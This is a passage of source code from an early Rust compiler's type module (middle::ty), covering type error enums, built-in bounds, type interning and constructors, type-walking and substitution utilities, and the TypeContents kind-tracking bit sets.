trans purposes ty_unboxed_vec(mt), } #[deriving(Clone, Eq, TotalEq, Hash)] pub struct TyTrait { def_id: DefId, substs: substs, store: TraitStore, mutability: ast::Mutability, bounds: BuiltinBounds } #[deriving(Eq, TotalEq, Hash)] pub struct TraitRef { def_id: DefId, substs: substs } #[deriving(Clone, Eq)] pub enum IntVarValue { IntType(ast::IntTy), UintType(ast::UintTy), } #[deriving(Clone, Show)] pub enum terr_vstore_kind { terr_vec, terr_str, terr_fn, terr_trait } #[deriving(Clone, Show)] pub struct expected_found<T> { expected: T, found: T } // Data structures used in type unification #[deriving(Clone, Show)] pub enum type_err { terr_mismatch, terr_purity_mismatch(expected_found<Purity>), terr_onceness_mismatch(expected_found<Onceness>), terr_abi_mismatch(expected_found<AbiSet>), terr_mutability, terr_sigil_mismatch(expected_found<ast::Sigil>), terr_box_mutability, terr_ptr_mutability, terr_ref_mutability, terr_vec_mutability, terr_tuple_size(expected_found<uint>), terr_ty_param_size(expected_found<uint>), terr_record_size(expected_found<uint>), terr_record_mutability, terr_record_fields(expected_found<Ident>), terr_arg_count, terr_regions_does_not_outlive(Region, Region), terr_regions_not_same(Region, Region), terr_regions_no_overlap(Region, Region), terr_regions_insufficiently_polymorphic(BoundRegion, Region), terr_regions_overly_polymorphic(BoundRegion, Region), terr_vstores_differ(terr_vstore_kind, expected_found<vstore>), terr_trait_stores_differ(terr_vstore_kind, expected_found<TraitStore>), terr_in_field(@type_err, 
ast::Ident), terr_sorts(expected_found<t>), terr_integer_as_char, terr_int_mismatch(expected_found<IntVarValue>), terr_float_mismatch(expected_found<ast::FloatTy>), terr_traits(expected_found<ast::DefId>), terr_builtin_bounds(expected_found<BuiltinBounds>), terr_variadic_mismatch(expected_found<bool>) } #[deriving(Eq, TotalEq, Hash)] pub struct ParamBounds { builtin_bounds: BuiltinBounds, trait_bounds: Vec<@TraitRef> } pub type BuiltinBounds = EnumSet<BuiltinBound>; #[deriving(Clone, Encodable, Eq, TotalEq, Decodable, Hash, Show)] #[repr(uint)] pub enum BuiltinBound { BoundStatic, BoundSend, BoundSized, BoundCopy, BoundShare, } pub fn EmptyBuiltinBounds() -> BuiltinBounds { EnumSet::empty() } pub fn AllBuiltinBounds() -> BuiltinBounds { let mut set = EnumSet::empty(); set.add(BoundStatic); set.add(BoundSend); set.add(BoundSized); set.add(BoundShare); set } impl CLike for BuiltinBound { fn to_uint(&self) -> uint { *self as uint } fn from_uint(v: uint) -> BuiltinBound { unsafe { cast::transmute(v) } } } #[deriving(Clone, Eq, TotalEq, Hash)] pub struct TyVid(uint); #[deriving(Clone, Eq, TotalEq, Hash)] pub struct IntVid(uint); #[deriving(Clone, Eq, TotalEq, Hash)] pub struct FloatVid(uint); #[deriving(Clone, Eq, TotalEq, Encodable, Decodable, Hash)] pub struct RegionVid { id: uint } #[deriving(Clone, Eq, TotalEq, Hash)] pub enum InferTy { TyVar(TyVid), IntVar(IntVid), FloatVar(FloatVid) } #[deriving(Clone, Encodable, Decodable, TotalEq, Hash, Show)] pub enum InferRegion { ReVar(RegionVid), ReSkolemized(uint, BoundRegion) } impl cmp::Eq for InferRegion { fn eq(&self, other: &InferRegion) -> bool { match ((*self), *other) { (ReVar(rva), ReVar(rvb)) => { rva == rvb } (ReSkolemized(rva, _), ReSkolemized(rvb, _)) => { rva == rvb } _ => false } } fn ne(&self, other: &InferRegion) -> bool { !((*self) == (*other)) } } pub trait Vid { fn to_uint(&self) -> uint; } impl Vid for TyVid { fn to_uint(&self) -> uint { let TyVid(v) = *self; v } } impl fmt::Show for TyVid { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result{ write!(f.buf, "<generic \\#{}>", self.to_uint()) } } impl Vid for IntVid { fn to_uint(&self) -> uint { let IntVid(v) = *self; v } } impl fmt::Show for IntVid { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f.buf, "<generic integer \\#{}>", self.to_uint()) } } impl Vid for FloatVid { fn to_uint(&self) -> uint { let FloatVid(v) = *self; v } } impl fmt::Show for FloatVid { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f.buf, "<generic float \\#{}>", self.to_uint()) } } impl Vid for RegionVid { fn to_uint(&self) -> uint { self.id } } impl fmt::Show for RegionVid { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { self.id.fmt(f) } } impl fmt::Show for FnSig { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { // grr, without tcx not much we can do. write!(f.buf, "(...)") } } impl fmt::Show for InferTy { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match *self { TyVar(ref v) => v.fmt(f), IntVar(ref v) => v.fmt(f), FloatVar(ref v) => v.fmt(f), } } } impl fmt::Show for IntVarValue { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match *self { IntType(ref v) => v.fmt(f), UintType(ref v) => v.fmt(f), } } } #[deriving(Clone)] pub struct TypeParameterDef { ident: ast::Ident, def_id: ast::DefId, bounds: @ParamBounds, default: Option<ty::t> } #[deriving(Encodable, Decodable, Clone)] pub struct RegionParameterDef { name: ast::Name, def_id: ast::DefId, } /// Information about the type/lifetime parameters associated with an item. 
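/// For a hypothetical declaration such as `struct Foo<'a, T: Send>`, the
/// `type_param_defs` list describes `T` together with its `Send` bound, and
/// `region_param_defs` describes `'a`.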
/// Analogous to ast::Generics.
#[deriving(Clone)]
pub struct Generics {
    /// List of type parameters declared on the item.
    type_param_defs: Rc<Vec<TypeParameterDef> >,

    /// List of region parameters declared on the item.
    /// For a fn or method, only includes *early-bound* lifetimes.
    region_param_defs: Rc<Vec<RegionParameterDef> >,
}

impl Generics {
    pub fn has_type_params(&self) -> bool {
        !self.type_param_defs.is_empty()
    }
    pub fn type_param_defs<'a>(&'a self) -> &'a [TypeParameterDef] {
        self.type_param_defs.as_slice()
    }
    pub fn region_param_defs<'a>(&'a self) -> &'a [RegionParameterDef] {
        self.region_param_defs.as_slice()
    }
}

/// When type checking, we use the `ParameterEnvironment` to track
/// details about the type/lifetime parameters that are in scope.
/// It primarily stores the bounds information.
///
/// Note: This information might seem to be redundant with the data in
/// `tcx.ty_param_defs`, but it is not. That table contains the
/// parameter definitions from an "outside" perspective, but this
/// struct will contain the bounds for a parameter as seen from inside
/// the function body. Currently the only real distinction is that
/// bound lifetime parameters are replaced with free ones, but in the
/// future I hope to refine the representation of types so as to make
/// more distinctions clearer.
pub struct ParameterEnvironment {
    /// A substitution that can be applied to move from
    /// the "outer" view of a type or method to the "inner" view.
    /// In general, this means converting from bound parameters to
    /// free parameters. Since we currently represent bound/free type
    /// parameters in the same way, this only has an effect on regions.
    free_substs: ty::substs,

    /// Bound on the Self parameter
    self_param_bound: Option<@TraitRef>,

    /// Bounds on each numbered type parameter
    type_param_bounds: Vec<ParamBounds>,
}

/// A polytype.
///
/// - `bounds`: The list of bounds for each type parameter. The length of the
///   list also tells you how many type parameters there are.
///
/// - `rp`: true if the type is region-parameterized. Types can have at
///   most one region parameter, always called `&self`.
///
/// - `ty`: the base type. May have reference to the (unsubstituted) bound
///   region `&self` or to (unsubstituted) ty_param types
#[deriving(Clone)]
pub struct ty_param_bounds_and_ty {
    generics: Generics,
    ty: t
}

/// As `ty_param_bounds_and_ty` but for a trait ref.
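/// For a hypothetical `trait Iterable<A>: Send`, `generics` covers the
/// declared parameter `A`, `bounds` records the built-in `Send` supertrait
/// bound, and `trait_ref` names the trait as applied to its own parameters.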
pub struct TraitDef { generics: Generics, bounds: BuiltinBounds, trait_ref: @ty::TraitRef, } pub struct ty_param_substs_and_ty { substs: ty::substs, ty: ty::t } pub type type_cache = RefCell<DefIdMap<ty_param_bounds_and_ty>>; pub type node_type_table = RefCell<HashMap<uint,t>>; pub fn mk_ctxt(s: Session, dm: resolve::DefMap, named_region_map: resolve_lifetime::NamedRegionMap, map: ast_map::Map, freevars: freevars::freevar_map, region_maps: middle::region::RegionMaps, lang_items: @middle::lang_items::LanguageItems) -> ctxt { ctxt { named_region_map: named_region_map, item_variance_map: RefCell::new(DefIdMap::new()), interner: RefCell::new(FnvHashMap::new()), next_id: Cell::new(primitives::LAST_PRIMITIVE_ID), sess: s, def_map: dm, region_maps: region_maps, node_types: RefCell::new(HashMap::new()), node_type_substs: RefCell::new(NodeMap::new()), trait_refs: RefCell::new(NodeMap::new()), trait_defs: RefCell::new(DefIdMap::new()), map: map, intrinsic_defs: RefCell::new(DefIdMap::new()), freevars: RefCell::new(freevars), tcache: RefCell::new(DefIdMap::new()), rcache: RefCell::new(HashMap::new()), short_names_cache: RefCell::new(HashMap::new()), needs_unwind_cleanup_cache: RefCell::new(HashMap::new()), tc_cache: RefCell::new(HashMap::new()), ast_ty_to_ty_cache: RefCell::new(NodeMap::new()), enum_var_cache: RefCell::new(DefIdMap::new()), methods: RefCell::new(DefIdMap::new()), trait_method_def_ids: RefCell::new(DefIdMap::new()), trait_methods_cache: RefCell::new(DefIdMap::new()), impl_trait_cache: RefCell::new(DefIdMap::new()), ty_param_defs: RefCell::new(NodeMap::new()), adjustments: RefCell::new(NodeMap::new()), normalized_cache: RefCell::new(HashMap::new()), lang_items: lang_items, provided_method_sources: RefCell::new(DefIdMap::new()), supertraits: RefCell::new(DefIdMap::new()), destructor_for_type: RefCell::new(DefIdMap::new()), destructors: RefCell::new(DefIdSet::new()), trait_impls: RefCell::new(DefIdMap::new()), inherent_impls: RefCell::new(DefIdMap::new()), impls: RefCell::new(DefIdMap::new()), used_unsafe: RefCell::new(NodeSet::new()), used_mut_nodes: RefCell::new(NodeSet::new()), impl_vtables: RefCell::new(DefIdMap::new()), populated_external_types: RefCell::new(DefIdSet::new()), populated_external_traits: RefCell::new(DefIdSet::new()), upvar_borrow_map: RefCell::new(HashMap::new()), extern_const_statics: RefCell::new(DefIdMap::new()), extern_const_variants: RefCell::new(DefIdMap::new()), } } // Type constructors // Interns a type/name combination, stores the resulting box in cx.interner, // and returns the box as cast to an unsafe ptr (see comments for t above). pub fn mk_t(cx: &ctxt, st: sty) -> t { // Check for primitive types. 
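    // Primitive types live in static `t_box_` singletons (see `mod
    // primitives` above), so they bypass the interner entirely: e.g. a
    // hypothetical `mk_t(cx, ty_bool)` returns the same pointer as
    // `mk_bool()` without ever touching `cx.interner`.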
match st { ty_nil => return mk_nil(), ty_err => return mk_err(), ty_bool => return mk_bool(), ty_int(i) => return mk_mach_int(i), ty_uint(u) => return mk_mach_uint(u), ty_float(f) => return mk_mach_float(f), ty_char => return mk_char(), ty_bot => return mk_bot(), _ => {} }; let key = intern_key { sty: &st }; match cx.interner.borrow().find(&key) { Some(t) => unsafe { return cast::transmute(&t.sty); }, _ => () } let mut flags = 0u; fn rflags(r: Region) -> uint { (has_regions as uint) | { match r { ty::ReInfer(_) => needs_infer as uint, _ => 0u } } } fn sflags(substs: &substs) -> uint { let mut f = 0u; for tt in substs.tps.iter() { f |= get(*tt).flags; } match substs.regions { ErasedRegions => {} NonerasedRegions(ref regions) => { for r in regions.iter() { f |= rflags(*r) } } } return f; } match &st { &ty_str(vstore_slice(r)) => { flags |= rflags(r); } &ty_vec(ref mt, vstore_slice(r)) => { flags |= rflags(r); flags |= get(mt.ty).flags; } &ty_nil | &ty_bool | &ty_char | &ty_int(_) | &ty_float(_) | &ty_uint(_) | &ty_str(_) => {} // You might think that we could just return ty_err for // any type containing ty_err as a component, and get // rid of the has_ty_err flag -- likewise for ty_bot (with // the exception of function types that return bot). // But doing so caused sporadic memory corruption, and // neither I (tjc) nor nmatsakis could figure out why, // so we're doing it this way. &ty_bot => flags |= has_ty_bot as uint, &ty_err => flags |= has_ty_err as uint, &ty_param(_) => flags |= has_params as uint, &ty_infer(_) => flags |= needs_infer as uint, &ty_self(_) => flags |= has_self as uint, &ty_enum(_, ref substs) | &ty_struct(_, ref substs) | &ty_trait(~ty::TyTrait { ref substs, .. }) => { flags |= sflags(substs); match st { ty_trait(~ty::TyTrait { store: RegionTraitStore(r), .. }) => { flags |= rflags(r); } _ => {} } } &ty_box(tt) | &ty_uniq(tt) => { flags |= get(tt).flags } &ty_vec(ref m, _) | &ty_ptr(ref m) | &ty_unboxed_vec(ref m) => { flags |= get(m.ty).flags; } &ty_rptr(r, ref m) => { flags |= rflags(r); flags |= get(m.ty).flags; } &ty_tup(ref ts) => for tt in ts.iter() { flags |= get(*tt).flags; }, &ty_bare_fn(ref f) => { for a in f.sig.inputs.iter() { flags |= get(*a).flags; } flags |= get(f.sig.output).flags; // T -> _|_ is *not* _|_ ! flags &= !(has_ty_bot as uint); } &ty_closure(ref f) => { flags |= rflags(f.region); for a in f.sig.inputs.iter() { flags |= get(*a).flags; } flags |= get(f.sig.output).flags; // T -> _|_ is *not* _|_ ! 
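        // E.g. a hypothetical `fn() -> !` carries has_ty_bot only via its
        // return type; the mask below strips the flag from the function type
        // itself, since a diverging function is still an ordinary value.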
flags &= !(has_ty_bot as uint); } } let t = ~t_box_ { sty: st, id: cx.next_id.get(), flags: flags, }; let sty_ptr = &t.sty as *sty; let key = intern_key { sty: sty_ptr, }; cx.interner.borrow_mut().insert(key, t); cx.next_id.set(cx.next_id.get() + 1); unsafe { cast::transmute::<*sty, t>(sty_ptr) } } #[inline] pub fn mk_prim_t(primitive: &'static t_box_) -> t { unsafe { cast::transmute::<&'static t_box_, t>(primitive) } } #[inline] pub fn mk_nil() -> t { mk_prim_t(&primitives::TY_NIL) } #[inline] pub fn mk_err() -> t { mk_prim_t(&primitives::TY_ERR) } #[inline] pub fn mk_bot() -> t { mk_prim_t(&primitives::TY_BOT) } #[inline] pub fn mk_bool() -> t { mk_prim_t(&primitives::TY_BOOL) } #[inline] pub fn mk_int() -> t { mk_prim_t(&primitives::TY_INT) } #[inline] pub fn mk_i8() -> t { mk_prim_t(&primitives::TY_I8) } #[inline] pub fn mk_i16() -> t { mk_prim_t(&primitives::TY_I16) } #[inline] pub fn mk_i32() -> t { mk_prim_t(&primitives::TY_I32) } #[inline] pub fn mk_i64() -> t { mk_prim_t(&primitives::TY_I64) } #[inline] pub fn mk_f32() -> t { mk_prim_t(&primitives::TY_F32) } #[inline] pub fn mk_f64() -> t { mk_prim_t(&primitives::TY_F64) } #[inline] pub fn mk_uint() -> t { mk_prim_t(&primitives::TY_UINT) } #[inline] pub fn mk_u8() -> t { mk_prim_t(&primitives::TY_U8) } #[inline] pub fn mk_u16() -> t { mk_prim_t(&primitives::TY_U16) } #[inline] pub fn mk_u32() -> t { mk_prim_t(&primitives::TY_U32) } #[inline] pub fn mk_u64() -> t { mk_prim_t(&primitives::TY_U64) } pub fn mk_mach_int(tm: ast::IntTy) -> t { match tm { ast::TyI => mk_int(), ast::TyI8 => mk_i8(), ast::TyI16 => mk_i16(), ast::TyI32 => mk_i32(), ast::TyI64 => mk_i64(), } } pub fn mk_mach_uint(tm: ast::UintTy) -> t { match tm { ast::TyU => mk_uint(), ast::TyU8 => mk_u8(), ast::TyU16 => mk_u16(), ast::TyU32 => mk_u32(), ast::TyU64 => mk_u64(), } } pub fn mk_mach_float(tm: ast::FloatTy) -> t { match tm { ast::TyF32 => mk_f32(), ast::TyF64 => mk_f64(), } } #[inline] pub fn mk_char() -> t { mk_prim_t(&primitives::TY_CHAR) } pub fn mk_str(cx: &ctxt, t: vstore) -> t { mk_t(cx, ty_str(t)) } pub fn mk_enum(cx: &ctxt, did: ast::DefId, substs: substs) -> t { // take a copy of substs so that we own the vectors inside mk_t(cx, ty_enum(did, substs)) } pub fn mk_box(cx: &ctxt, ty: t) -> t { mk_t(cx, ty_box(ty)) } pub fn mk_uniq(cx: &ctxt, ty: t) -> t { mk_t(cx, ty_uniq(ty)) } pub fn mk_ptr(cx: &ctxt, tm: mt) -> t { mk_t(cx, ty_ptr(tm)) } pub fn mk_rptr(cx: &ctxt, r: Region, tm: mt) -> t { mk_t(cx, ty_rptr(r, tm)) } pub fn mk_mut_rptr(cx: &ctxt, r: Region, ty: t) -> t { mk_rptr(cx, r, mt {ty: ty, mutbl: ast::MutMutable}) } pub fn mk_imm_rptr(cx: &ctxt, r: Region, ty: t) -> t { mk_rptr(cx, r, mt {ty: ty, mutbl: ast::MutImmutable}) } pub fn mk_mut_ptr(cx: &ctxt, ty: t) -> t { mk_ptr(cx, mt {ty: ty, mutbl: ast::MutMutable}) } pub fn mk_imm_ptr(cx: &ctxt, ty: t) -> t { mk_ptr(cx, mt {ty: ty, mutbl: ast::MutImmutable}) } pub fn mk_nil_ptr(cx: &ctxt) -> t { mk_ptr(cx, mt {ty: mk_nil(), mutbl: ast::MutImmutable}) } pub fn mk_vec(cx: &ctxt, tm: mt, t: vstore) -> t { mk_t(cx, ty_vec(tm, t)) } pub fn mk_unboxed_vec(cx: &ctxt, tm: mt) -> t { mk_t(cx, ty_unboxed_vec(tm)) } pub fn mk_mut_unboxed_vec(cx: &ctxt, ty: t) -> t { mk_t(cx, ty_unboxed_vec(mt {ty: ty, mutbl: ast::MutImmutable})) } pub fn mk_tup(cx: &ctxt, ts: Vec<t>) -> t { mk_t(cx, ty_tup(ts)) } pub fn mk_closure(cx: &ctxt, fty: ClosureTy) -> t { mk_t(cx, ty_closure(~fty)) } pub fn mk_bare_fn(cx: &ctxt, fty: BareFnTy) -> t { mk_t(cx, ty_bare_fn(fty)) } pub fn mk_ctor_fn(cx: &ctxt, binder_id: ast::NodeId, 
input_tys: &[ty::t], output: ty::t) -> t { let input_args = input_tys.iter().map(|t| *t).collect(); mk_bare_fn(cx, BareFnTy { purity: ast::ImpureFn, abis: AbiSet::Rust(), sig: FnSig { binder_id: binder_id, inputs: input_args, output: output, variadic: false } }) } pub fn mk_trait(cx: &ctxt, did: ast::DefId, substs: substs, store: TraitStore, mutability: ast::Mutability, bounds: BuiltinBounds) -> t { // take a copy of substs so that we own the vectors inside let inner = ~TyTrait { def_id: did, substs: substs, store: store, mutability: mutability, bounds: bounds }; mk_t(cx, ty_trait(inner)) } pub fn mk_struct(cx: &ctxt, struct_id: ast::DefId, substs: substs) -> t { // take a copy of substs so that we own the vectors inside mk_t(cx, ty_struct(struct_id, substs)) } pub fn mk_var(cx: &ctxt, v: TyVid) -> t { mk_infer(cx, TyVar(v)) } pub fn mk_int_var(cx: &ctxt, v: IntVid) -> t { mk_infer(cx, IntVar(v)) } pub fn mk_float_var(cx: &ctxt, v: FloatVid) -> t { mk_infer(cx, FloatVar(v)) } pub fn mk_infer(cx: &ctxt, it: InferTy) -> t { mk_t(cx, ty_infer(it)) } pub fn mk_self(cx: &ctxt, did: ast::DefId) -> t { mk_t(cx, ty_self(did)) } pub fn mk_param(cx: &ctxt, n: uint, k: DefId) -> t { mk_t(cx, ty_param(param_ty { idx: n, def_id: k })) } pub fn walk_ty(ty: t, f: |t|) { maybe_walk_ty(ty, |t| { f(t); true }); } pub fn maybe_walk_ty(ty: t, f: |t| -> bool) { if !f(ty) { return; } match get(ty).sty { ty_nil | ty_bot | ty_bool | ty_char | ty_int(_) | ty_uint(_) | ty_float(_) | ty_str(_) | ty_self(_) | ty_infer(_) | ty_param(_) | ty_err => {} ty_box(ty) | ty_uniq(ty) => maybe_walk_ty(ty, f), ty_vec(ref tm, _) | ty_unboxed_vec(ref tm) | ty_ptr(ref tm) | ty_rptr(_, ref tm) => { maybe_walk_ty(tm.ty, f); } ty_enum(_, ref substs) | ty_struct(_, ref substs) | ty_trait(~TyTrait { ref substs, .. }) => { for subty in (*substs).tps.iter() { maybe_walk_ty(*subty, |x| f(x)); } } ty_tup(ref ts) => { for tt in ts.iter() { maybe_walk_ty(*tt, |x| f(x)); } } ty_bare_fn(ref ft) => { for a in ft.sig.inputs.iter() { maybe_walk_ty(*a, |x| f(x)); } maybe_walk_ty(ft.sig.output, f); } ty_closure(ref ft) => { for a in ft.sig.inputs.iter() { maybe_walk_ty(*a, |x| f(x)); } maybe_walk_ty(ft.sig.output, f); } } } // Folds types from the bottom up. pub fn fold_ty(cx: &ctxt, t0: t, fldop: |t| -> t) -> t { let mut f = ty_fold::BottomUpFolder {tcx: cx, fldop: fldop}; f.fold_ty(t0) } pub fn walk_regions_and_ty(cx: &ctxt, ty: t, fldr: |r: Region|, fldt: |t: t|) -> t { ty_fold::RegionFolder::general(cx, |r| { fldr(r); r }, |t| { fldt(t); t }).fold_ty(ty) } pub fn fold_regions(cx: &ctxt, ty: t, fldr: |r: Region| -> Region) -> t { ty_fold::RegionFolder::regions(cx, fldr).fold_ty(ty) } // Substitute *only* type parameters. Used in trans where regions are erased. 
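// For example (illustrative): substituting tps = [int] into the scheme of
// a `struct Foo<T>` rewrites the `ty_param` with index 0 to int, yielding
// the type of `Foo<int>`; a `ty_self` is rewritten to `self_ty_opt`, which
// must therefore be supplied whenever Self can occur (see below).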
pub fn subst_tps(tcx: &ctxt, tps: &[t], self_ty_opt: Option<t>, typ: t) -> t { let mut subst = TpsSubst { tcx: tcx, self_ty_opt: self_ty_opt, tps: tps }; return subst.fold_ty(typ); struct TpsSubst<'a> { tcx: &'a ctxt, self_ty_opt: Option<t>, tps: &'a [t], } impl<'a> TypeFolder for TpsSubst<'a> { fn tcx<'a>(&'a self) -> &'a ctxt { self.tcx } fn fold_ty(&mut self, t: ty::t) -> ty::t { if self.tps.len() == 0u && self.self_ty_opt.is_none() { return t; } let tb = ty::get(t); if self.self_ty_opt.is_none() && !tbox_has_flag(tb, has_params) { return t; } match ty::get(t).sty { ty_param(p) => { self.tps[p.idx] } ty_self(_) => { match self.self_ty_opt { None => self.tcx.sess.bug("ty_self unexpected here"), Some(self_ty) => self_ty } } _ => { ty_fold::super_fold_ty(self, t) } } } } } pub fn substs_is_noop(substs: &substs) -> bool { let regions_is_noop = match substs.regions { ErasedRegions => false, // may be used to canonicalize NonerasedRegions(ref regions) => regions.is_empty() }; substs.tps.len() == 0u && regions_is_noop && substs.self_ty.is_none() } pub fn substs_to_str(cx: &ctxt, substs: &substs) -> ~str { substs.repr(cx) } pub fn subst(cx: &ctxt, substs: &substs, typ: t) -> t { typ.subst(cx, substs) } // Type utilities pub fn type_is_nil(ty: t) -> bool { get(ty).sty == ty_nil } pub fn type_is_bot(ty: t) -> bool { (get(ty).flags & (has_ty_bot as uint)) != 0 } pub fn type_is_error(ty: t) -> bool { (get(ty).flags & (has_ty_err as uint)) != 0 } pub fn type_needs_subst(ty: t) -> bool { tbox_has_flag(get(ty), needs_subst) } pub fn trait_ref_contains_error(tref: &ty::TraitRef) -> bool { tref.substs.self_ty.iter().any(|&t| type_is_error(t)) || tref.substs.tps.iter().any(|&t| type_is_error(t)) } pub fn type_is_ty_var(ty: t) -> bool { match get(ty).sty { ty_infer(TyVar(_)) => true, _ => false } } pub fn type_is_bool(ty: t) -> bool { get(ty).sty == ty_bool } pub fn type_is_self(ty: t) -> bool { match get(ty).sty { ty_self(..) => true, _ => false } } pub fn type_is_structural(ty: t) -> bool { match get(ty).sty { ty_struct(..) | ty_tup(_) | ty_enum(..) | ty_closure(_) | ty_trait(..) 
| ty_vec(_, vstore_fixed(_)) | ty_str(vstore_fixed(_)) | ty_vec(_, vstore_slice(_)) | ty_str(vstore_slice(_)) => true, _ => false } } pub fn type_is_sequence(ty: t) -> bool { match get(ty).sty { ty_str(_) | ty_vec(_, _) => true, _ => false } } pub fn type_is_simd(cx: &ctxt, ty: t) -> bool { match get(ty).sty { ty_struct(did, _) => lookup_simd(cx, did), _ => false } } pub fn type_is_str(ty: t) -> bool { match get(ty).sty { ty_str(_) => true, _ => false } } pub fn sequence_element_type(cx: &ctxt, ty: t) -> t { match get(ty).sty { ty_str(_) => return mk_mach_uint(ast::TyU8), ty_vec(mt, _) | ty_unboxed_vec(mt) => return mt.ty, _ => cx.sess.bug("sequence_element_type called on non-sequence value"), } } pub fn simd_type(cx: &ctxt, ty: t) -> t { match get(ty).sty { ty_struct(did, ref substs) => { let fields = lookup_struct_fields(cx, did); lookup_field_type(cx, did, fields.get(0).id, substs) } _ => fail!("simd_type called on invalid type") } } pub fn simd_size(cx: &ctxt, ty: t) -> uint { match get(ty).sty { ty_struct(did, _) => { let fields = lookup_struct_fields(cx, did); fields.len() } _ => fail!("simd_size called on invalid type") } } pub fn get_element_type(ty: t, i: uint) -> t { match get(ty).sty { ty_tup(ref ts) => return *ts.get(i), _ => fail!("get_element_type called on invalid type") } } pub fn type_is_box(ty: t) -> bool { match get(ty).sty { ty_box(_) => return true, _ => return false } } pub fn type_is_boxed(ty: t) -> bool { match get(ty).sty { ty_box(_) => true, _ => false } } pub fn type_is_region_ptr(ty: t) -> bool { match get(ty).sty { ty_rptr(_, _) => true, _ => false } } pub fn type_is_slice(ty: t) -> bool { match get(ty).sty { ty_vec(_, vstore_slice(_)) | ty_str(vstore_slice(_)) => true, _ => return false } } pub fn type_is_unique_box(ty: t) -> bool { match get(ty).sty { ty_uniq(_) => return true, _ => return false } } pub fn type_is_unsafe_ptr(ty: t) -> bool { match get(ty).sty { ty_ptr(_) => return true, _ => return false } } pub fn type_is_vec(ty: t) -> bool { return match get(ty).sty { ty_vec(_, _) | ty_unboxed_vec(_) => true, ty_str(_) => true, _ => false }; } pub fn type_is_unique(ty: t) -> bool { match get(ty).sty { ty_uniq(_) | ty_vec(_, vstore_uniq) | ty_str(vstore_uniq) => true, _ => false } } /* A scalar type is one that denotes an atomic datum, with no sub-components. (A ty_ptr is scalar because it represents a non-managed pointer, so its contents are abstract to rustc.) */ pub fn type_is_scalar(ty: t) -> bool { match get(ty).sty { ty_nil | ty_bool | ty_char | ty_int(_) | ty_float(_) | ty_uint(_) | ty_infer(IntVar(_)) | ty_infer(FloatVar(_)) | ty_bare_fn(..) | ty_ptr(_) => true, _ => false } } pub fn type_needs_drop(cx: &ctxt, ty: t) -> bool { type_contents(cx, ty).needs_drop(cx) } // Some things don't need cleanups during unwinding because the // task can free them all at once later. Currently only things // that only contain scalars and shared boxes can avoid unwind // cleanups. 
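// For example (illustrative): a `~int` stored outside of any `@` box must
// be freed during unwinding, whereas an `@~int` needs no unwind cleanup,
// since the annihilator reclaims everything reachable from managed boxes.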
pub fn type_needs_unwind_cleanup(cx: &ctxt, ty: t) -> bool {
    match cx.needs_unwind_cleanup_cache.borrow().find(&ty) {
        Some(&result) => return result,
        None => ()
    }

    let mut tycache = HashSet::new();
    let needs_unwind_cleanup =
        type_needs_unwind_cleanup_(cx, ty, &mut tycache, false);
    cx.needs_unwind_cleanup_cache.borrow_mut().insert(ty, needs_unwind_cleanup);
    return needs_unwind_cleanup;
}

fn type_needs_unwind_cleanup_(cx: &ctxt, ty: t,
                              tycache: &mut HashSet<t>,
                              encountered_box: bool) -> bool {

    // Prevent infinite recursion
    if !tycache.insert(ty) {
        return false;
    }

    let mut encountered_box = encountered_box;
    let mut needs_unwind_cleanup = false;
    maybe_walk_ty(ty, |ty| {
        let old_encountered_box = encountered_box;
        let result = match get(ty).sty {
            ty_box(_) => {
                encountered_box = true;
                true
            }
            ty_nil | ty_bot | ty_bool | ty_int(_) | ty_uint(_) | ty_float(_) |
            ty_tup(_) | ty_ptr(_) => {
                true
            }
            ty_enum(did, ref substs) => {
                for v in (*enum_variants(cx, did)).iter() {
                    for aty in v.args.iter() {
                        let t = subst(cx, substs, *aty);
                        needs_unwind_cleanup |=
                            type_needs_unwind_cleanup_(cx, t, tycache,
                                                       encountered_box);
                    }
                }
                !needs_unwind_cleanup
            }
            ty_uniq(_) | ty_str(vstore_uniq) | ty_vec(_, vstore_uniq) => {
                // Once we're inside a box, the annihilator will find
                // it and destroy it.
                if !encountered_box {
                    needs_unwind_cleanup = true;
                    false
                } else {
                    true
                }
            }
            _ => {
                needs_unwind_cleanup = true;
                false
            }
        };

        encountered_box = old_encountered_box;
        result
    });

    return needs_unwind_cleanup;
}

/**
 * Type contents is how the type checker reasons about kinds.
 * They track what kinds of things are found within a type. You can
 * think of them as kind of an "anti-kind". They track the kinds of values
 * and things that are contained in types. Having a larger contents for
 * a type tends to rule that type *out* from various kinds. For example,
 * a type that contains a reference is not sendable.
 *
 * The reason we compute type contents and not kinds is that it is
 * easier for me (nmatsakis) to think about what is contained within
 * a type than to think about what is *not* contained within a type.
 */
pub struct TypeContents {
    bits: u64
}

macro_rules!
def_type_content_sets( (mod $mname:ident { $($name:ident = $bits:expr),+ }) => { mod $mname { use middle::ty::TypeContents; $(pub static $name: TypeContents = TypeContents { bits: $bits };)+ } } ) def_type_content_sets!( mod TC { None = 0b0000_0000__0000_0000__0000, // Things that are interior to the value (first nibble): InteriorUnsized = 0b0000_0000__0000_0000__0001, InteriorUnsafe = 0b0000_0000__0000_0000__0010, // InteriorAll = 0b00000000__00000000__1111, // Things that are owned by the value (second and third nibbles): OwnsOwned = 0b0000_0000__0000_0001__0000, OwnsDtor = 0b0000_0000__0000_0010__0000, OwnsManaged /* see [1] below */ = 0b0000_0000__0000_0100__0000, OwnsAffine = 0b0000_0000__0000_1000__0000, OwnsAll = 0b0000_0000__1111_1111__0000, // Things that are reachable by the value in any way (fourth nibble): ReachesNonsendAnnot = 0b0000_0001__0000_0000__0000, ReachesBorrowed = 0b0000_0010__0000_0000__0000, // ReachesManaged /* see [1] below */ = 0b0000_0100__0000_0000__0000, ReachesMutable = 0b0000_1000__0000_0000__0000, ReachesNoShare = 0b0001_0000__0000_0000__0000, ReachesAll = 0b0001_1111__0000_0000__0000, // Things that cause values to *move* rather than *copy* Moves = 0b0000_0000__0000_1011__0000, // Things that mean drop glue is necessary NeedsDrop = 0b0000_0000__0000_0111__0000, // Things that prevent values from being sent // // Note: For checking whether something is sendable, it'd // be sufficient to have ReachesManaged. However, we include // both ReachesManaged and OwnsManaged so that when // a parameter has a bound T:Send, we are able to deduce // that it neither reaches nor owns a managed pointer. Nonsendable = 0b0000_0111__0000_0100__0000, // Things that prevent values from being considered 'static Nonstatic = 0b0000_0010__0000_0000__0000, // 